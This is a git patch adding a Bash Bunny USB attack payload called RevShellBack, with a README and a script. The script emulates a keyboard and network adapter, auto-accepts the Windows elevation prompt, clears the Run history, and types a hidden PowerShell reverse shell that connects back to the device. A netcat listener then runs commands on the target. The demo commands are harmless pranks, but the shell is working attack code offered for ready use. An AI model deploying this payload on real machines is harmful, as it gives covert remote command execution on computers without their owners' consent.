From c58e10dcabede37f6f49c9da018986ae02439f2f Mon Sep 17 00:00:00 2001
From: Andre Santos <NodePoint@users.noreply.github.com>
Date: Wed, 25 Oct 2017 21:06:13 +0100
Subject: [PATCH] Add RevShellBack payload (#265)

---
 .../library/execution/RevShellBack/README.md  | 32 ++++++++++
 .../execution/RevShellBack/payload.txt        | 62 +++++++++++++++++++
 2 files changed, 94 insertions(+)
 create mode 100644 payloads/library/execution/RevShellBack/README.md
 create mode 100644 payloads/library/execution/RevShellBack/payload.txt

diff --git a/payloads/library/execution/RevShellBack/README.md b/payloads/library/execution/RevShellBack/README.md
new file mode 100644
index 00000000..d239cbef
--- /dev/null
+++ b/payloads/library/execution/RevShellBack/README.md
@@ -0,0 +1,32 @@
+# RevShellBack
+
+- Author: NodePoint
+- Version: 0.1.3
+- Target: Windows
+- Category: Execution
+
+## Description
+
+Set up a reverse shell and execute PowerShell/generic commands in the background from the Bash Bunny via USB ethernet.
+
+## Configuration
+
+Place powershell and/or generic commands between lines 53 and 58 (within the EOF).
+<br>
+Need to run as admin? Set the variable ADMIN to true.
+<br>
+Having issues obtaining a connection with the listener? Alter the time before connection attempt in NCDELAY.
+
+## STATUS
+
+| LED      | Status                                    |
+| -------- | ----------------------------------------- |
+| SETUP    | Setup (attackmode, variables, networking) |
+| STAGE1   | Open CMD (bypass UAC if ADMIN is true)    |
+| STAGE2   | Initiate reverse shell                    |
+| SPECIAL1 | Set up listener and send out commands     |
+| FINISH   | Finished                                  |
+
+## Discussion
+
+https://forums.hak5.org/topic/41955-payload-revshellback/
diff --git a/payloads/library/execution/RevShellBack/payload.txt b/payloads/library/execution/RevShellBack/payload.txt
new file mode 100644
index 00000000..674c71e0
--- /dev/null
+++ b/payloads/library/execution/RevShellBack/payload.txt
@@ -0,0 +1,62 @@
+#!/bin/bash
+#
+# Title:         RevShellBack
+# Description:   Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
+# Author:        NodePoint
+# Version:       0.1.3
+# Category:      Execution
+# Target:        Windows
+# Attackmodes:   Ethernet, HID
+
+# Set attack mode
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+# Set variables
+GET HOST_IP
+GET TARGET_HOSTNAME
+# Netcat port number
+NCPORT=4444
+# Delay before attempting to connect to the netcat listener (ms)
+NCDELAY=200
+ADMIN=false
+
+# Setup networking
+echo 1 > /proc/sys/net/ipv4/ip_forward
+iptables -A INPUT -i usb0 -p tcp --dport $NCPORT -j ACCEPT
+iptables -t nat -A PREROUTING -i usb0 -p tcp --dport $NCPORT -j DNAT --to-destination $HOST_IP:$NCPORT
+
+# Open CMD
+LED STAGE1
+if [ "$ADMIN" = true ] ; then
+    # Bypass UAC
+    RUN WIN powershell -c "Start-Process cmd -verb runas"
+    Q DELAY 1500
+    Q ALT Y
+    Q DELAY 300
+    # Hide CMD
+    Q STRING "mode 18,1 & color FE & cd C:\ & title "
+    Q ENTER
+else
+    # Run as normal user
+    RUN WIN cmd /K "mode 18,1 & color FE & cd C:\ & title "
+    Q DELAY 150
+fi
+
+# Initiate reverse shell
+LED STAGE2
+Q STRING "powershell -W Hidden \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;Start-Sleep -m $NCDELAY;\$sm=(New-Object Net.Sockets.TCPClient('$HOST_IP',$NCPORT)).GetStream();[byte[]]\$bt=0..65535|%{0};while((\$i=\$sm.Read(\$bt,0,\$bt.Length)) -ne 0){;\$d=(New-Object Text.ASCIIEncoding).GetString(\$bt,0,\$i);\$st=([text.encoding]::ASCII).GetBytes((iex \$d 2>&1));\$sm.Write(\$st,0,\$st.Length)}\" & exit"
+Q ENTER
+
+# Attack -- commands go within EOF
+LED SPECIAL1
+nc -q 0 -l -p $NCPORT <<EOF
+echo "Hello. :)" > "C:/Users/\$env:username/Desktop/reverseshelled.txt"
+\$Eject = New-Object -ComObject "Shell.Application";\$Eject.Namespace(17).Items() | Where-Object { \$_.Type -eq "CD Drive" } | foreach { \$_.InvokeVerb("Eject") }
+calc;
+Start-Sleep -m 300;Add-Type -AssemblyName PresentationCore,PresentationFramework;[System.Windows.MessageBox]::Show("Hello, \$env:username.\`nYour PC name is '$TARGET_HOSTNAME'.\`n\`nCheck your desktop for the file 'reverseshelled.txt'.\`nIf you have a CD/DVD drive with a disc tray, check that too.",'RevShellBack','Ok','Info')
+EOF
+
+# Done
+ATTACKMODE OFF
+LED FINISH